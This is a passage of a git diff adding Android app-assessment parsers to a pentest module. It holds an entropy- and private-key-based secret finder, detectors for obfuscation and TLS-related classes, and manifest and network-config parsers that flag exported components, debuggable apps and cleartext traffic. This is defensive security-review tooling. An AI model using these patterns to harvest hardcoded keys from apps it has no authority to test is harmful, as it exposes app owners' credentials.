+      if (str.includes("-----BEGIN") && str.includes("PRIVATE KEY")) {
+        suspicious.push({ type: "private_key", value: str, confidence: "high" })
+        continue
+      }
+
+      // High entropy strings (potential secrets)
+      const entropy = calculateEntropy(str)
+      if (entropy > 4.5 && str.length >= 32 && /^[A-Za-z0-9+/=_-]+$/.test(str)) {
+        suspicious.push({ type: "generic_secret", value: str, confidence: "medium" })
+      }
+    }
+
+    return suspicious
+  }
+
+  /**
+   * Calculate Shannon entropy of a string.
+   */
+  function calculateEntropy(str: string): number {
+    const freq: Record<string, number> = {}
+    for (const char of str) {
+      freq[char] = (freq[char] || 0) + 1
+    }
+
+    let entropy = 0
+    const len = str.length
+    for (const count of Object.values(freq)) {
+      const p = count / len
+      entropy -= p * Math.log2(p)
+    }
+
+    return entropy
+  }
+
+  /**
+   * Analyze DEX classes for security patterns.
+   */
+  export function analyzeClasses(classes: ClassInfo[]): {
+    obfuscated: boolean
+    obfuscationRatio: number
+    securityClasses: string[]
+  } {
+    let obfuscatedCount = 0
+    const securityClasses: string[] = []
+
+    const securityPatterns = [
+      "TrustManager",
+      "X509TrustManager",
+      "HostnameVerifier",
+      "SSLSocketFactory",
+      "CertificatePinner",
+      "KeyStore",
+      "SecretKey",
+      "Cipher",
+      "MessageDigest",
+    ]
+
+    for (const cls of classes) {
+      // Check for obfuscation (single letter class names, etc.)
+      const className = cls.name.split("/").pop() || ""
+      if (/^[a-z]$/.test(className) || /^[a-z]{1,2}$/.test(className)) {
+        obfuscatedCount++
+      }
+
+      // Check for security-related classes
+      for (const pattern of securityPatterns) {
+        if (cls.name.includes(pattern) || cls.superclass?.includes(pattern)) {
+          securityClasses.push(cls.name)
+          break
+        }
+      }
+    }
+
+    const obfuscationRatio = classes.length > 0 ? obfuscatedCount / classes.length : 0
+
+    return {
+      obfuscated: obfuscationRatio > 0.3,
+      obfuscationRatio,
+      securityClasses,
+    }
+  }
+
+  /**
+   * Find method calls matching a pattern.
+   */
+  export function findMethodCalls(
+    methods: MethodInfo[],
+    classPattern: string,
+    methodPattern?: string
+  ): Array<{
+    callingClass: string
+    callingMethod: string
+    targetCall: string
+  }> {
+    const results: Array<{
+      callingClass: string
+      callingMethod: string
+      targetCall: string
+    }> = []
+
+    const classRegex = new RegExp(classPattern, "i")
+    const methodRegex = methodPattern ? new RegExp(methodPattern, "i") : null
+
+    for (const method of methods) {
+      for (const call of method.calls || []) {
+        if (classRegex.test(call)) {
+          if (!methodRegex || methodRegex.test(call)) {
+            results.push({
+              callingClass: method.class_name,
+              callingMethod: method.name,
+              targetCall: call,
+            })
+          }
+        }
+      }
+    }
+
+    return results
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/parsers/apktool.ts b/packages/opencode/src/pentest/mobilescan/parsers/apktool.ts
new file mode 100644
index 00000000000..6fd2dfa8d5a
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/parsers/apktool.ts
@@ -0,0 +1,707 @@
+/**
+ * @fileoverview APKTool Output Parser
+ *
+ * Parser for APKTool decompiled Android APK files.
+ * Extracts manifest, resources, and smali code information.
+ *
+ * @module pentest/mobilescan/parsers/apktool
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+import path from "path"
+
+const log = Log.create({ service: "mobilescan.parser.apktool" })
+
+/**
+ * APKTool parser namespace.
+ */
+export namespace ApktoolParser {
+  /**
+   * APKTool output structure.
+   */
+  export interface ApktoolOutput {
+    manifestPath: string
+    resourcesPath: string
+    smaliDirs: string[]
+    assetsPath: string
+    libPath: string
+    apktoolYaml?: ApktoolYaml
+  }
+
+  /**
+   * apktool.yml structure.
+   */
+  export interface ApktoolYaml {
+    version: string
+    apkFileName: string
+    isFrameworkApk: boolean
+    usesFramework: string[]
+    sdkInfo?: {
+      minSdkVersion: string
+      targetSdkVersion: string
+    }
+    packageInfo?: {
+      forcedPackageId: string
+      renameManifestPackage: string | null
+    }
+    compressionType: string
+    sharedLibrary: boolean
+    sparseResources: boolean
+    unknownFiles: Record<string, string>
+    doNotCompress: string[]
+  }
+
+  /**
+   * Parse APKTool output directory.
+   */
+  export async function parseOutput(outputDir: string): Promise<ApktoolOutput> {
+    log.info("Parsing APKTool output", { outputDir })
+
+    const manifestPath = path.join(outputDir, "AndroidManifest.xml")
+    const resourcesPath = path.join(outputDir, "res")
+    const assetsPath = path.join(outputDir, "assets")
+    const libPath = path.join(outputDir, "lib")
+    const apktoolYamlPath = path.join(outputDir, "apktool.yml")
+
+    // Find smali directories
+    const smaliDirs: string[] = []
+    try {
+      const entries = await fs.readdir(outputDir, { withFileTypes: true })
+      for (const entry of entries) {
+        if (entry.isDirectory() && entry.name.startsWith("smali")) {
+          smaliDirs.push(path.join(outputDir, entry.name))
+        }
+      }
+    } catch {
+      log.warn("Failed to read smali directories", { outputDir })
+    }
+
+    // Parse apktool.yml if exists
+    let apktoolYaml: ApktoolYaml | undefined
+    try {
+      const yamlContent = await fs.readFile(apktoolYamlPath, "utf-8")
+      apktoolYaml = parseApktoolYaml(yamlContent)
+    } catch {
+      log.debug("apktool.yml not found or could not be parsed", { outputDir })
+    }
+
+    return {
+      manifestPath,
+      resourcesPath,
+      smaliDirs,
+      assetsPath,
+      libPath,
+      apktoolYaml,
+    }
+  }
+
+  /**
+   * Parse apktool.yml content.
+   */
+  function parseApktoolYaml(content: string): ApktoolYaml {
+    const lines = content.split("\n")
+    const result: Partial<ApktoolYaml> = {
+      usesFramework: [],
+      unknownFiles: {},
+      doNotCompress: [],
+    }
+
+    let currentSection = ""
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Top-level properties
+      if (line.startsWith("version:")) {
+        result.version = trimmed.replace("version:", "").trim().replace(/['"]/g, "")
+      } else if (line.startsWith("apkFileName:")) {
+        result.apkFileName = trimmed.replace("apkFileName:", "").trim()
+      } else if (line.startsWith("isFrameworkApk:")) {
+        result.isFrameworkApk = trimmed.includes("true")
+      } else if (line.startsWith("compressionType:")) {
+        result.compressionType = trimmed.replace("compressionType:", "").trim()
+      } else if (line.startsWith("sharedLibrary:")) {
+        result.sharedLibrary = trimmed.includes("true")
+      } else if (line.startsWith("sparseResources:")) {
+        result.sparseResources = trimmed.includes("true")
+      } else if (line.startsWith("sdkInfo:")) {
+        currentSection = "sdkInfo"
+        result.sdkInfo = { minSdkVersion: "", targetSdkVersion: "" }
+      } else if (line.startsWith("packageInfo:")) {
+        currentSection = "packageInfo"
+        result.packageInfo = { forcedPackageId: "", renameManifestPackage: null }
+      } else if (line.startsWith("usesFramework:")) {
+        currentSection = "usesFramework"
+      } else if (line.startsWith("unknownFiles:")) {
+        currentSection = "unknownFiles"
+      } else if (line.startsWith("doNotCompress:")) {
+        currentSection = "doNotCompress"
+      } else if (trimmed.startsWith("-") && currentSection === "usesFramework") {
+        result.usesFramework?.push(trimmed.replace("-", "").trim())
+      } else if (trimmed.startsWith("-") && currentSection === "doNotCompress") {
+        result.doNotCompress?.push(trimmed.replace("-", "").trim())
+      } else if (currentSection === "sdkInfo" && result.sdkInfo) {
+        if (trimmed.startsWith("minSdkVersion:")) {
+          result.sdkInfo.minSdkVersion = trimmed.replace("minSdkVersion:", "").trim().replace(/['"]/g, "")
+        } else if (trimmed.startsWith("targetSdkVersion:")) {
+          result.sdkInfo.targetSdkVersion = trimmed.replace("targetSdkVersion:", "").trim().replace(/['"]/g, "")
+        }
+      } else if (currentSection === "packageInfo" && result.packageInfo) {
+        if (trimmed.startsWith("forcedPackageId:")) {
+          result.packageInfo.forcedPackageId = trimmed.replace("forcedPackageId:", "").trim().replace(/['"]/g, "")
+        }
+      }
+    }
+
+    return result as ApktoolYaml
+  }
+
+  /**
+   * Parse AndroidManifest.xml from APKTool output.
+   */
+  export async function parseManifest(manifestPath: string): Promise<MobileScanTypes.AndroidManifest> {
+    log.info("Parsing AndroidManifest.xml", { manifestPath })
+
+    const content = await fs.readFile(manifestPath, "utf-8")
+    return parseManifestXml(content)
+  }
+
+  /**
+   * Parse manifest XML content.
+   */
+  export function parseManifestXml(xml: string): MobileScanTypes.AndroidManifest {
+    // Extract package name
+    const packageMatch = xml.match(/package\s*=\s*["']([^"']+)["']/)
+    const packageName = packageMatch ? packageMatch[1] : "unknown"
+
+    // Extract version info
+    const versionCodeMatch = xml.match(/android:versionCode\s*=\s*["'](\d+)["']/)
+    const versionNameMatch = xml.match(/android:versionName\s*=\s*["']([^"']+)["']/)
+    const versionCode = versionCodeMatch ? parseInt(versionCodeMatch[1], 10) : 1
+    const versionName = versionNameMatch ? versionNameMatch[1] : "1.0"
+
+    // Extract SDK versions
+    const minSdkMatch = xml.match(/android:minSdkVersion\s*=\s*["'](\d+)["']/)
+    const targetSdkMatch = xml.match(/android:targetSdkVersion\s*=\s*["'](\d+)["']/)
+    const compileSdkMatch = xml.match(/android:compileSdkVersion\s*=\s*["'](\d+)["']/)
+    const minSdkVersion = minSdkMatch ? parseInt(minSdkMatch[1], 10) : 1
+    const targetSdkVersion = targetSdkMatch ? parseInt(targetSdkMatch[1], 10) : minSdkVersion
+    const compileSdkVersion = compileSdkMatch ? parseInt(compileSdkMatch[1], 10) : undefined
+
+    // Extract application attributes
+    const allowBackupMatch = xml.match(/android:allowBackup\s*=\s*["'](true|false)["']/)
+    const debuggableMatch = xml.match(/android:debuggable\s*=\s*["'](true|false)["']/)
+    const usesCleartextMatch = xml.match(/android:usesCleartextTraffic\s*=\s*["'](true|false)["']/)
+    const networkConfigMatch = xml.match(/android:networkSecurityConfig\s*=\s*["']([^"']+)["']/)
+    const extractNativeMatch = xml.match(/android:extractNativeLibs\s*=\s*["'](true|false)["']/)
+    const largeHeapMatch = xml.match(/android:largeHeap\s*=\s*["'](true|false)["']/)
+    const supportsRtlMatch = xml.match(/android:supportsRtl\s*=\s*["'](true|false)["']/)
+    const sharedUserIdMatch = xml.match(/android:sharedUserId\s*=\s*["']([^"']+)["']/)
+    const appLabelMatch = xml.match(/android:label\s*=\s*["']([^"']+)["']/)
+
+    const allowBackup = allowBackupMatch ? allowBackupMatch[1] === "true" : true
+    const debuggable = debuggableMatch ? debuggableMatch[1] === "true" : false
+    const usesCleartextTraffic = usesCleartextMatch ? usesCleartextMatch[1] === "true" : undefined
+    const networkSecurityConfig = networkConfigMatch ? networkConfigMatch[1] : undefined
+    const extractNativeLibs = extractNativeMatch ? extractNativeMatch[1] === "true" : undefined
+    const largeHeap = largeHeapMatch ? largeHeapMatch[1] === "true" : undefined
+    const supportsRtl = supportsRtlMatch ? supportsRtlMatch[1] === "true" : undefined
+    const sharedUserId = sharedUserIdMatch ? sharedUserIdMatch[1] : undefined
+    const applicationLabel = appLabelMatch ? appLabelMatch[1] : undefined
+
+    // Extract permissions
+    const permissions = parsePermissions(xml)
+
+    // Extract components
+    const activities = parseComponents(xml, "activity")
+    const services = parseComponents(xml, "service")
+    const receivers = parseComponents(xml, "receiver")
+    const providers = parseProviders(xml)
+
+    // Extract uses-feature
+    const usesFeatures: string[] = []
+    const featureMatches = xml.matchAll(/<uses-feature[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+    for (const match of featureMatches) {
+      usesFeatures.push(match[1])
+    }
+
+    // Extract uses-library
+    const usesLibraries: string[] = []
+    const libraryMatches = xml.matchAll(/<uses-library[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+    for (const match of libraryMatches) {
+      usesLibraries.push(match[1])
+    }
+
+    // Find main activity
+    let mainActivity: string | undefined
+    const mainActivityMatch = xml.match(
+      /<activity[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*>[\s\S]*?<action[^>]+android:name\s*=\s*["']android\.intent\.action\.MAIN["'][^>]*\/?>[\s\S]*?<\/activity>/
+    )
+    if (mainActivityMatch) {
+      mainActivity = mainActivityMatch[1]
+    }
+
+    return {
+      packageName,
+      versionCode,
+      versionName,
+      minSdkVersion,
+      targetSdkVersion,
+      compileSdkVersion,
+      permissions,
+      activities,
+      services,
+      receivers,
+      providers,
+      usesFeatures,
+      usesLibraries,
+      allowBackup,
+      debuggable,
+      usesCleartextTraffic,
+      networkSecurityConfig,
+      extractNativeLibs,
+      largeHeap,
+      supportsRtl,
+      sharedUserId,
+      mainActivity,
+      applicationLabel,
+    }
+  }
+
+  /**
+   * Parse permissions from manifest XML.
+   */
+  function parsePermissions(xml: string): MobileScanTypes.AndroidPermission[] {
+    const permissions: MobileScanTypes.AndroidPermission[] = []
+
+    // Standard uses-permission
+    const permMatches = xml.matchAll(/<uses-permission[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+    for (const match of permMatches) {
+      const name = match[1]
+      permissions.push({
+        name,
+        protection: getPermissionProtection(name),
+        granted: true,
+        customPermission: !name.startsWith("android.permission."),
+        risk: getPermissionRisk(name),
+      })
+    }
+
+    // Custom defined permissions
+    const defPermMatches = xml.matchAll(
+      /<permission[^>]+android:name\s*=\s*["']([^"']+)["'][^>]+android:protectionLevel\s*=\s*["']([^"']+)["'][^>]*\/?>/g
+    )
+    for (const match of defPermMatches) {
+      const name = match[1]
+      const protection = match[2] as MobileScanTypes.PermissionProtection
+      permissions.push({
+        name,
+        protection: protection || "normal",
+        granted: true,
+        customPermission: true,
+      })
+    }
+
+    return permissions
+  }
+
+  /**
+   * Get permission protection level.
+   */
+  function getPermissionProtection(name: string): MobileScanTypes.PermissionProtection {
+    if (MobileScanTypes.DANGEROUS_PERMISSIONS.includes(name)) {
+      return "dangerous"
+    }
+    if (name.includes("SIGNATURE")) {
+      return "signature"
+    }
+    return "normal"
+  }
+
+  /**
+   * Get permission risk level.
+   */
+  function getPermissionRisk(name: string): MobileScanTypes.Severity | undefined {
+    const highRisk = [
+      "android.permission.READ_SMS",
+      "android.permission.SEND_SMS",
+      "android.permission.RECEIVE_SMS",
+      "android.permission.RECORD_AUDIO",
+      "android.permission.CAMERA",
+      "android.permission.ACCESS_FINE_LOCATION",
+      "android.permission.READ_CONTACTS",
+      "android.permission.READ_CALL_LOG",
+      "android.permission.READ_PHONE_STATE",
+    ]
+
+    if (highRisk.includes(name)) {
+      return "high"
+    }
+
+    if (MobileScanTypes.DANGEROUS_PERMISSIONS.includes(name)) {
+      return "medium"
+    }
+
+    return undefined
+  }
+
+  /**
+   * Parse components (activity, service, receiver) from manifest.
+   */
+  function parseComponents(xml: string, type: "activity" | "service" | "receiver"): MobileScanTypes.AndroidComponent[] {
+    const components: MobileScanTypes.AndroidComponent[] = []
+    const componentType =
+      type === "activity" ? "activity" : type === "service" ? "service" : ("receiver" as MobileScanTypes.ComponentType)
+
+    // Match component blocks
+    const regex = new RegExp(`<${type}([^>]*(?:>|\\/>))([\\s\\S]*?)<\\/${type}>|<${type}([^>]*\\/>)`, "g")
+    const matches = xml.matchAll(regex)
+
+    for (const match of matches) {
+      const attrs = match[1] || match[3] || ""
+      const inner = match[2] || ""
+
+      // Extract name
+      const nameMatch = attrs.match(/android:name\s*=\s*["']([^"']+)["']/)
+      if (!nameMatch) continue
+
+      const name = nameMatch[1]
+
+      // Extract exported
+      const exportedMatch = attrs.match(/android:exported\s*=\s*["'](true|false)["']/)
+      // Default exported based on intent filters (if has intent filters and no explicit exported, defaults to true for API < 31)
+      const hasIntentFilters = inner.includes("<intent-filter")
+      const exported = exportedMatch ? exportedMatch[1] === "true" : hasIntentFilters
+
+      // Extract permission
+      const permissionMatch = attrs.match(/android:permission\s*=\s*["']([^"']+)["']/)
+      const permission = permissionMatch ? permissionMatch[1] : undefined
+
+      // Extract enabled
+      const enabledMatch = attrs.match(/android:enabled\s*=\s*["'](true|false)["']/)
+      const enabled = enabledMatch ? enabledMatch[1] === "true" : true
+
+      // Extract process name
+      const processMatch = attrs.match(/android:process\s*=\s*["']([^"']+)["']/)
+      const processName = processMatch ? processMatch[1] : undefined
+
+      // Activity-specific attributes
+      let launchMode: string | undefined
+      let taskAffinity: string | undefined
+      let allowTaskReparenting: boolean | undefined
+      let excludeFromRecents: boolean | undefined
+
+      if (type === "activity") {
+        const launchModeMatch = attrs.match(/android:launchMode\s*=\s*["']([^"']+)["']/)
+        launchMode = launchModeMatch ? launchModeMatch[1] : undefined
+
+        const taskAffinityMatch = attrs.match(/android:taskAffinity\s*=\s*["']([^"']+)["']/)
+        taskAffinity = taskAffinityMatch ? taskAffinityMatch[1] : undefined
+
+        const reparentingMatch = attrs.match(/android:allowTaskReparenting\s*=\s*["'](true|false)["']/)
+        allowTaskReparenting = reparentingMatch ? reparentingMatch[1] === "true" : undefined
+
+        const excludeMatch = attrs.match(/android:excludeFromRecents\s*=\s*["'](true|false)["']/)
+        excludeFromRecents = excludeMatch ? excludeMatch[1] === "true" : undefined
+      }
+
+      // Parse intent filters
+      const intentFilters = parseIntentFilters(inner)
+
+      components.push({
+        name,
+        type: componentType,
+        exported,
+        permission,
+        intentFilters,
+        enabled,
+        processName,
+        launchMode,
+        taskAffinity,
+        allowTaskReparenting,
+        excludeFromRecents,
+      })
+    }
+
+    return components
+  }
+
+  /**
+   * Parse content providers from manifest.
+   */
+  function parseProviders(xml: string): MobileScanTypes.AndroidComponent[] {
+    const providers: MobileScanTypes.AndroidComponent[] = []
+
+    const regex = /<provider([^>]*(?:>|\/>))([\s\S]*?)<\/provider>|<provider([^>]*\/>)/g
+    const matches = xml.matchAll(regex)
+
+    for (const match of matches) {
+      const attrs = match[1] || match[3] || ""
+      const inner = match[2] || ""
+
+      const nameMatch = attrs.match(/android:name\s*=\s*["']([^"']+)["']/)
+      if (!nameMatch) continue
+
+      const name = nameMatch[1]
+
+      const exportedMatch = attrs.match(/android:exported\s*=\s*["'](true|false)["']/)
+      const exported = exportedMatch ? exportedMatch[1] === "true" : false
+
+      const permissionMatch = attrs.match(/android:permission\s*=\s*["']([^"']+)["']/)
+      const permission = permissionMatch ? permissionMatch[1] : undefined
+
+      const authoritiesMatch = attrs.match(/android:authorities\s*=\s*["']([^"']+)["']/)
+      const authorities = authoritiesMatch ? authoritiesMatch[1] : undefined
+
+      const grantUriMatch = attrs.match(/android:grantUriPermissions\s*=\s*["'](true|false)["']/)
+      const grantUriPermissions = grantUriMatch ? grantUriMatch[1] === "true" : undefined
+
+      const readPermMatch = attrs.match(/android:readPermission\s*=\s*["']([^"']+)["']/)
+      const readPermission = readPermMatch ? readPermMatch[1] : undefined
+
+      const writePermMatch = attrs.match(/android:writePermission\s*=\s*["']([^"']+)["']/)
+      const writePermission = writePermMatch ? writePermMatch[1] : undefined
+
+      const enabledMatch = attrs.match(/android:enabled\s*=\s*["'](true|false)["']/)
+      const enabled = enabledMatch ? enabledMatch[1] === "true" : true
+
+      // Parse path-permissions
+      const pathPermissions: Array<{
+        path: string
+        type: "path" | "pathPrefix" | "pathPattern"
+        readPermission?: string
+        writePermission?: string
+      }> = []
+
+      const pathPermMatches = inner.matchAll(/<path-permission([^>]*)\/?>/g)
+      for (const pathMatch of pathPermMatches) {
+        const pathAttrs = pathMatch[1]
+        const pathVal =
+          pathAttrs.match(/android:path\s*=\s*["']([^"']+)["']/)?.[1] ||
+          pathAttrs.match(/android:pathPrefix\s*=\s*["']([^"']+)["']/)?.[1] ||
+          pathAttrs.match(/android:pathPattern\s*=\s*["']([^"']+)["']/)?.[1]
+
+        if (pathVal) {
+          pathPermissions.push({
+            path: pathVal,
+            type: pathAttrs.includes("pathPattern")
+              ? "pathPattern"
+              : pathAttrs.includes("pathPrefix")
+                ? "pathPrefix"
+                : "path",
+            readPermission: pathAttrs.match(/android:readPermission\s*=\s*["']([^"']+)["']/)?.[1],
+            writePermission: pathAttrs.match(/android:writePermission\s*=\s*["']([^"']+)["']/)?.[1],
+          })
+        }
+      }
+
+      providers.push({
+        name,
+        type: "provider",
+        exported,
+        permission,
+        intentFilters: [],
+        enabled,
+        authorities,
+        grantUriPermissions,
+        readPermission,
+        writePermission,
+        pathPermissions: pathPermissions.length > 0 ? pathPermissions : undefined,
+      })
+    }
+
+    return providers
+  }
+
+  /**
+   * Parse intent filters from component inner XML.
+   */
+  function parseIntentFilters(inner: string): MobileScanTypes.IntentFilter[] {
+    const filters: MobileScanTypes.IntentFilter[] = []
+
+    const filterMatches = inner.matchAll(/<intent-filter([^>]*)>([\s\S]*?)<\/intent-filter>/g)
+    for (const match of filterMatches) {
+      const attrs = match[1]
+      const filterInner = match[2]
+
+      const actions: string[] = []
+      const categories: string[] = []
+      const dataSchemes: string[] = []
+      const dataHosts: string[] = []
+      const dataPaths: string[] = []
+      const dataMimeTypes: string[] = []
+
+      // Parse actions
+      const actionMatches = filterInner.matchAll(/<action[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+      for (const actionMatch of actionMatches) {
+        actions.push(actionMatch[1])
+      }
+
+      // Parse categories
+      const categoryMatches = filterInner.matchAll(/<category[^>]+android:name\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+      for (const catMatch of categoryMatches) {
+        categories.push(catMatch[1])
+      }
+
+      // Parse data elements
+      const dataMatches = filterInner.matchAll(/<data([^>]*)\/?>/g)
+      for (const dataMatch of dataMatches) {
+        const dataAttrs = dataMatch[1]
+        const scheme = dataAttrs.match(/android:scheme\s*=\s*["']([^"']+)["']/)?.[1]
+        const host = dataAttrs.match(/android:host\s*=\s*["']([^"']+)["']/)?.[1]
+        const path = dataAttrs.match(/android:path\s*=\s*["']([^"']+)["']/)?.[1]
+        const mimeType = dataAttrs.match(/android:mimeType\s*=\s*["']([^"']+)["']/)?.[1]
+
+        if (scheme) dataSchemes.push(scheme)
+        if (host) dataHosts.push(host)
+        if (path) dataPaths.push(path)
+        if (mimeType) dataMimeTypes.push(mimeType)
+      }
+
+      // Extract priority
+      const priorityMatch = attrs.match(/android:priority\s*=\s*["'](\d+)["']/)
+      const priority = priorityMatch ? parseInt(priorityMatch[1], 10) : undefined
+
+      filters.push({
+        actions,
+        categories,
+        dataSchemes,
+        dataHosts,
+        dataPaths,
+        dataMimeTypes,
+        priority,
+      })
+    }
+
+    return filters
+  }
+
+  /**
+   * Find strings.xml files.
+   */
+  export async function findStringsFiles(resourcesPath: string): Promise<string[]> {
+    const stringsFiles: string[] = []
+
+    try {
+      const valuesDirs = await fs.readdir(resourcesPath)
+      for (const dir of valuesDirs) {
+        if (dir.startsWith("values")) {
+          const stringsPath = path.join(resourcesPath, dir, "strings.xml")
+          try {
+            await fs.access(stringsPath)
+            stringsFiles.push(stringsPath)
+          } catch {
+            // File doesn't exist
+          }
+        }
+      }
+    } catch {
+      log.debug("Failed to find strings files", { resourcesPath })
+    }
+
+    return stringsFiles
+  }
+
+  /**
+   * Parse network security config XML.
+   */
+  export async function parseNetworkSecurityConfig(
+    configPath: string
+  ): Promise<MobileScanTypes.NetworkSecurityConfig | null> {
+    try {
+      const content = await fs.readFile(configPath, "utf-8")
+      return parseNetworkSecurityConfigXml(content)
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Parse network security config XML content.
+   */
+  export function parseNetworkSecurityConfigXml(xml: string): MobileScanTypes.NetworkSecurityConfig {
+    const config: MobileScanTypes.NetworkSecurityConfig = {
+      cleartextTrafficPermitted: false,
+      trustAnchors: [],
+      pinnedDomains: [],
+      debugOverrides: false,
+      domainConfigs: [],
+    }
+
+    // Check base-config cleartext
+    const baseConfigMatch = xml.match(/<base-config[^>]+cleartextTrafficPermitted\s*=\s*["'](true|false)["']/)
+    if (baseConfigMatch) {
+      config.cleartextTrafficPermitted = baseConfigMatch[1] === "true"
+    }
+
+    // Check debug-overrides
+    if (xml.includes("<debug-overrides>")) {
+      config.debugOverrides = true
+    }
+
+    // Parse domain-config entries
+    const domainConfigMatches = xml.matchAll(/<domain-config([^>]*)>([\s\S]*?)<\/domain-config>/g)
+    for (const match of domainConfigMatches) {
+      const attrs = match[1]
+      const inner = match[2]
+
+      const cleartextMatch = attrs.match(/cleartextTrafficPermitted\s*=\s*["'](true|false)["']/)
+      const cleartextPermitted = cleartextMatch ? cleartextMatch[1] === "true" : undefined
+
+      // Get domains
+      const domainMatches = inner.matchAll(/<domain[^>]*includeSubdomains\s*=\s*["'](true|false)["'][^>]*>([^<]+)<\/domain>/g)
+      for (const domainMatch of domainMatches) {
+        const includeSubdomains = domainMatch[1] === "true"
+        const domain = domainMatch[2].trim()
+
+        config.domainConfigs.push({
+          domain,
+          includeSubdomains,
+          cleartextTrafficPermitted: cleartextPermitted,
+        })
+      }
+
+      // Check for pin-set (certificate pinning)
+      const pinSetMatch = inner.match(/<pin-set([^>]*)>([\s\S]*?)<\/pin-set>/)
+      if (pinSetMatch) {
+        const pinSetAttrs = pinSetMatch[1]
+        const pinSetInner = pinSetMatch[2]
+
+        const expirationMatch = pinSetAttrs.match(/expiration\s*=\s*["']([^"']+)["']/)
+        const pinExpiration = expirationMatch ? expirationMatch[1] : undefined
+
+        const pins: string[] = []
+        const pinMatches = pinSetInner.matchAll(/<pin[^>]+digest\s*=\s*["']([^"']+)["'][^>]*>([^<]+)<\/pin>/g)
+        for (const pinMatch of pinMatches) {
+          pins.push(`${pinMatch[1]}:${pinMatch[2].trim()}`)
+        }
+
+        // Add pinned domains from this config
+        const pinnedDomainMatches = inner.matchAll(/<domain[^>]*>([^<]+)<\/domain>/g)
+        for (const pdMatch of pinnedDomainMatches) {
+          const domain = pdMatch[1].trim()
+          const existingPinned = config.pinnedDomains.find((p) => p.domain === domain)
+          if (existingPinned) {
+            existingPinned.pins.push(...pins)
+          } else {
+            config.pinnedDomains.push({
+              domain,
+              includeSubdomains: inner.includes('includeSubdomains="true"'),
+              pins,
+              pinExpiration,
+            })
+          }
+        }
+      }
+    }
+
+    // Parse trust-anchors
+    const trustMatches = xml.matchAll(/<certificates\s+src\s*=\s*["']([^"']+)["'][^>]*\/?>/g)
+    for (const match of trustMatches) {
+      config.trustAnchors.push(match[1])
+    }
+
+    return config
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/parsers/index.ts b/packages/opencode/src/pentest/mobilescan/parsers/index.ts
new file mode 100644
index 00000000000..15ec8924e1d
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/parsers/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Mobile Scanner Parsers
+ *
+ * Parsers for various mobile security analysis tools.
+ *
+ * @module pentest/mobilescan/parsers
+ */
+
+export { ApktoolParser } from "./apktool"
+export { JadxParser } from "./jadx"
+export { MobsfParser } from "./mobsf"
+export { AndroguardParser } from "./androguard"
diff --git a/packages/opencode/src/pentest/mobilescan/parsers/jadx.ts b/packages/opencode/src/pentest/mobilescan/parsers/jadx.ts
new file mode 100644
index 00000000000..cfe0292d31d
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/parsers/jadx.ts
@@ -0,0 +1,570 @@
+/**
+ * @fileoverview JADX Output Parser
+ *
+ * Parser for JADX decompiled Java source code.
+ * Extracts code patterns, method calls, and security-relevant code.
+ *
+ * @module pentest/mobilescan/parsers/jadx
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+import path from "path"
+
+const log = Log.create({ service: "mobilescan.parser.jadx" })
+
+/**
+ * JADX parser namespace.
+ */
+export namespace JadxParser {
+  /**
+   * JADX output structure.
+   */
+  export interface JadxOutput {
+    sourcesDir: string
+    resourcesDir: string
+    javaFiles: string[]
+    totalClasses: number
+  }
+
+  /**
+   * Code pattern match.
+   */
+  export interface CodeMatch {
+    file: string
+    line: number
+    code: string
+    className?: string
+    methodName?: string
+    context?: string
+  }
+
+  /**
+   * Security pattern.
+   */
+  export interface SecurityPattern {
+    name: string
+    pattern: RegExp
+    severity: MobileScanTypes.Severity
+    owaspMobile: MobileScanTypes.OwaspMobile
+    description: string
+  }
+
+  /**
+   * Parse JADX output directory.
+   */
+  export async function parseOutput(outputDir: string): Promise<JadxOutput> {
+    log.info("Parsing JADX output", { outputDir })
+
+    const sourcesDir = path.join(outputDir, "sources")
+    const resourcesDir = path.join(outputDir, "resources")
+
+    // Find all Java files
+    const javaFiles = await findJavaFiles(sourcesDir)
+
+    return {
+      sourcesDir,
+      resourcesDir,
+      javaFiles,
+      totalClasses: javaFiles.length,
+    }
+  }
+
+  /**
+   * Find all Java files in directory recursively.
+   */
+  async function findJavaFiles(dir: string): Promise<string[]> {
+    const files: string[] = []
+
+    async function walk(currentDir: string): Promise<void> {
+      try {
+        const entries = await fs.readdir(currentDir, { withFileTypes: true })
+        for (const entry of entries) {
+          const fullPath = path.join(currentDir, entry.name)
+          if (entry.isDirectory()) {
+            await walk(fullPath)
+          } else if (entry.name.endsWith(".java")) {
+            files.push(fullPath)
+          }
+        }
+      } catch {
+        // Directory doesn't exist or can't be read
+      }
+    }
+
+    await walk(dir)
+    return files
+  }
+
+  /**
+   * Search for pattern in Java files.
+   */
+  export async function searchPattern(
+    javaFiles: string[],
+    pattern: RegExp,
+    contextLines: number = 3
+  ): Promise<CodeMatch[]> {
+    const matches: CodeMatch[] = []
+
+    for (const file of javaFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (let i = 0; i < lines.length; i++) {
+          if (pattern.test(lines[i])) {
+            // Get context
+            const startLine = Math.max(0, i - contextLines)
+            const endLine = Math.min(lines.length - 1, i + contextLines)
+            const context = lines.slice(startLine, endLine + 1).join("\n")
+
+            // Extract class and method names
+            const className = extractClassName(content)
+            const methodName = extractMethodName(lines, i)
+
+            matches.push({
+              file,
+              line: i + 1,
+              code: lines[i].trim(),
+              className,
+              methodName,
+              context,
+            })
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return matches
+  }
+
+  /**
+   * Search for multiple patterns.
+   */
+  export async function searchPatterns(
+    javaFiles: string[],
+    patterns: SecurityPattern[]
